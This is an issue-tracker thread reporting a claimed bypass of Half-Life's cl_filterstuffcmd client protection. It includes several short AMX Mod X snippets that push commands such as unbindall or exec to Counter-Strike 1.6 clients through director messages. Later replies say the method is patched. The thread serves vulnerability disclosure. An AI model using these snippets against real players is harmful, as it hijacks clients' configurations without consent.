Halflife: cl_filterstuffcmd has been bypassed by servers
Counter-Strike 1.6 servers can bypass any slowhacking protection by a specified message towards the client. The following code basically is an AMX Mod X stock which can be used to slowhack:
stock SendCmd_1( id , text[] ) {
message_begin( MSG_ONE, 51, _, id )
write_byte( strlen(text) + 2 )
write_byte( 10 )
write_string( text )
message_end()
}
Would be nice, if servers wouldn't be able to write anything into game files...
TIVRSG
All 15 comments
Have you personally checked this with the latest version of the game client? This method was fixed almost a year ago in spring updates.
Splatt581
on 6 Feb 2020
Yes I have, currently I'm checking over it again, but it runs commands on client side, even with cl_filterstuffcmd 3.
TIVRSG
on 6 Feb 2020
Cvar cl_filterstuffcmd has only two values 0 and 1. What commands, for example? Perhaps these commands are not in the list, because cl_filterstuffcmd has a list of blocked cvars/cmds, it does not block all cvars/cmds.
Splatt581
on 6 Feb 2020
Point taken, but I can send unbindall, exec, motd_write for some examples.
TIVRSG
on 6 Feb 2020
So I guess, this can be solved, if servers cannot send any commands at all.
TIVRSG
on 6 Feb 2020
The motd_write command was fixed a long time ago and cannot write any files via client console. It is also in list of blocked cmds.
The commands exec and unbindall also cannot be executed remotely in the client console.
I just checked all this on the latest version of the client, are you definitely using this?:
] version
Protocol version 48
Exe version 1.1.2.7/Stdio (cstrike)
Exe build: 15:17:55 Jul 24 2019 (8308)
Fixing such problems is necessary primarily on the client side, because the server side can always be patched and forced to send the necessary data.
Splatt581
on 6 Feb 2020
DRC_CMD_STUFFTEXT it's filtered through pfnFilteredClientCmd().
Your client is outdated maybe.
magister4813
on 6 Feb 2020
My issue is still with a similar code... I have reverse engineered a plugin, and it had this stock ( if I did it correctly )
public client_e2(id, String:text[])
{
if (is_user_connected(id))
{
message_begin(MSG_ONE, SVC_DIRECTOR, 176, id);
write_byte(strlen(text) + 2);
write_byte(10);
write_string(text);
message_end();
}
return 0;
}
As far as I'm concerned, this allows still to run some commands, but tell me if I'm wrong.
TIVRSG
on 6 Feb 2020
On what version did you test it ?
DarkGL
on 6 Feb 2020
:/
it's impossible, attach the plugin :/
afwn90cj93201nixr2e1re
on 7 Feb 2020
Which game are you testing this with?
Solokiller
on 11 Feb 2020
?
Counter-Strike 1.6 servers can bypass
afwn90cj93201nixr2e1re
on 12 Feb 2020
This does not work anymore.
stock client_cmd_ex(id, const command[], any:...)
{
#pragma unused command
if (id == 0 || is_user_connected(id))
{
new szMessage[256]
format_args(szMessage, charsmax(szMessage), 1)
message_begin(id == 0 ? MSG_ALL : MSG_ONE, 51, _, id)
write_byte(strlen(szMessage) + 2)
write_byte(10)
write_string(szMessage)
message_end()
}
}
LayerFort
on 15 Feb 2020
#pragma unused command x D
afwn90cj93201nixr2e1re
on 15 Feb 2020
#pragma unused commandx D
You aren鈥檛 reading are you?
client_cmd_ex(id, const command[], any:...)
LayerFort
on 17 Feb 2020
Related issues
perforatorRU
路
3Comments
metita
路
3Comments
Yetoo1
路
3Comments
ghost
路
4Comments
BlackShadow
路
3Comments
Most helpful comment
This does not work anymore.